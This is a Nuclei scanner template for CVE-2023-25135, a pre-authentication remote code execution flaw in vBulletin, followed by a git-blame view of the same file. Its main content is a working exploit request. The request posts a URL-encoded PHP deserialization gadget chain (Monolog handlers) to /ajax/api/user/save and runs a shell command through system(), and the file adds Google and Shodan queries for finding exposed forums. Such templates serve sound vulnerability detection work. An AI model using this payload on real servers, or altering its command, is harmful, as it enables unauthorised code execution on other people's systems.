nuclei-templates/http/cves/2023/CVE-2023-25135.yaml

id: CVE-2023-25135

info:
  name: vBulletin <= 5.6.9 - Pre-authentication Remote Code Execution
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    vBulletin before 5.6.9 PL1 allows an unauthenticated remote attacker to execute arbitrary code via a crafted HTTP request that triggers deserialization. This occurs because verify_serialized checks that a value is serialized by calling unserialize and then checking for errors.
  reference:
    - https://www.ambionics.io/blog/vbulletin-unserializable-but-unreachable
    - https://github.com/ambionics/vbulletin-exploits/blob/main/vbulletin-rce-cve-2023-25135.py
    - https://nvd.nist.gov/vuln/detail/CVE-2023-25135
    - https://forum.vbulletin.com/forum/vbulletin-announcements/vbulletin-announcements_aa/4473890-vbulletin-5-6-9-security-patch
  remediation: The fixed versions are 5.6.7 PL1, 5.6.8 PL1, and 5.6.9 PL1.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cwe-id: CWE-502
  metadata:
    max-request: 1
    verified: true
    google-query: intext:"Powered By vBulletin"
    shodan-query: http.component:"vBulletin"
  tags: cve,cve2023,vbulletin,rce,kev

requests:
  - raw:
      - |
        POST /ajax/api/user/save HTTP/1.1
        Content-Type: application/x-www-form-urlencoded

        adminoptions=&options=&password={{randstr}}&securitytoken={{randstr}}&user%5Bemail%5D={{randstr}}&user%5Bpassword%5D={{randstr}}&user%5Bsearchprefs%5D=a%3A2%3A%7Bi%3A0%3BO%3A27%3A%22googlelogin_vendor_autoload%22%3A0%3A%7B%7Di%3A1%3BO%3A32%3A%22Monolog%5CHandler%5CSyslogUdpHandler%22%3A1%3A%7Bs%3A9%3A%22%00%2A%00socket%22%3BO%3A29%3A%22Monolog%5CHandler%5CBufferHandler%22%3A7%3A%7Bs%3A10%3A%22%00%2A%00handler%22%3Br%3A4%3Bs%3A13%3A%22%00%2A%00bufferSize%22%3Bi%3A-1%3Bs%3A9%3A%22%00%2A%00buffer%22%3Ba%3A1%3A%7Bi%3A0%3Ba%3A2%3A%7Bi%3A0%3Bs%3A36%3A%22echo+n8ZCwFfp%3A%3A%3B+ls%3B+echo+%3A%3An8ZCwFfp%22%3Bs%3A5%3A%22level%22%3BN%3B%7D%7Ds%3A8%3A%22%00%2A%00level%22%3BN%3Bs%3A14%3A%22%00%2A%00initialized%22%3Bb%3A1%3Bs%3A14%3A%22%00%2A%00bufferLimit%22%3Bi%3A-1%3Bs%3A13%3A%22%00%2A%00processors%22%3Ba%3A2%3A%7Bi%3A0%3Bs%3A7%3A%22current%22%3Bi%3A1%3Bs%3A6%3A%22system%22%3B%7D%7D%7D%7D&user%5Busername%5D=toto&userfield=&userid=0

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "n8ZCwFfp::"

      - type: word
        part: header
        words:
          - "application/json"

      - type: status
        status:
          - 200
Create CVE-2023-25135.yaml 2023-05-09 16:40:11 +00:00			`id: CVE-2023-25135`

			`info:`
			`name: vBulletin <= 5.6.9 - Pre-authentication Remote Code Execution`
			`author: iamnoooob,rootxharsh,pdresearch`
			`severity: critical`
			`description: \|`
			`vBulletin before 5.6.9 PL1 allows an unauthenticated remote attacker to execute arbitrary code via a crafted HTTP request that triggers deserialization. This occurs because verify_serialized checks that a value is serialized by calling unserialize and then checking for errors.`
			`reference:`
			`- https://www.ambionics.io/blog/vbulletin-unserializable-but-unreachable`
			`- https://github.com/ambionics/vbulletin-exploits/blob/main/vbulletin-rce-cve-2023-25135.py`
			`- https://nvd.nist.gov/vuln/detail/CVE-2023-25135`
			`- https://forum.vbulletin.com/forum/vbulletin-announcements/vbulletin-announcements_aa/4473890-vbulletin-5-6-9-security-patch`
			`remediation: The fixed versions are 5.6.7 PL1, 5.6.8 PL1, and 5.6.9 PL1.`
			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
			`cvss-score: 9.8`
			`cwe-id: CWE-502`
			`metadata:`
			`max-request: 1`
			`verified: true`
change in query 2023-05-09 17:12:10 +00:00			`google-query: intext:"Powered By vBulletin"`
			`shodan-query: http.component:"vBulletin"`
Create CVE-2023-25135.yaml 2023-05-09 16:40:11 +00:00			`tags: cve,cve2023,vbulletin,rce,kev`

			`requests:`
			`- raw:`
			`- \|`
			`POST /ajax/api/user/save HTTP/1.1`
			`Content-Type: application/x-www-form-urlencoded`

			adminoptions=&options=&password={{randstr}}&securitytoken={{randstr}}&user%5Bemail%5D={{randstr}}&user%5Bpassword%5D={{randstr}}&user%5Bsearchprefs%5D=a%3A2%3A%7Bi%3A0%3BO%3A27%3A%22googlelogin_vendor_autoload%22%3A0%3A%7B%7Di%3A1%3BO%3A32%3A%22Monolog%5CHandler%5CSyslogUdpHandler%22%3A1%3A%7Bs%3A9%3A%22%00%2A%00socket%22%3BO%3A29%3A%22Monolog%5CHandler%5CBufferHandler%22%3A7%3A%7Bs%3A10%3A%22%00%2A%00handler%22%3Br%3A4%3Bs%3A13%3A%22%00%2A%00bufferSize%22%3Bi%3A-1%3Bs%3A9%3A%22%00%2A%00buffer%22%3Ba%3A1%3A%7Bi%3A0%3Ba%3A2%3A%7Bi%3A0%3Bs%3A36%3A%22echo+n8ZCwFfp%3A%3A%3B+ls%3B+echo+%3A%3An8ZCwFfp%22%3Bs%3A5%3A%22level%22%3BN%3B%7D%7Ds%3A8%3A%22%00%2A%00level%22%3BN%3Bs%3A14%3A%22%00%2A%00initialized%22%3Bb%3A1%3Bs%3A14%3A%22%00%2A%00bufferLimit%22%3Bi%3A-1%3Bs%3A13%3A%22%00%2A%00processors%22%3Ba%3A2%3A%7Bi%3A0%3Bs%3A7%3A%22current%22%3Bi%3A1%3Bs%3A6%3A%22system%22%3B%7D%7D%7D%7D&user%5Busername%5D=toto&userfield=&userid=0

			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`part: body`
			`words:`
			`- "n8ZCwFfp::"`

			`- type: word`
			`part: header`
			`words:`
			`- "application/json"`

			`- type: status`
			`status:`
			`- 200`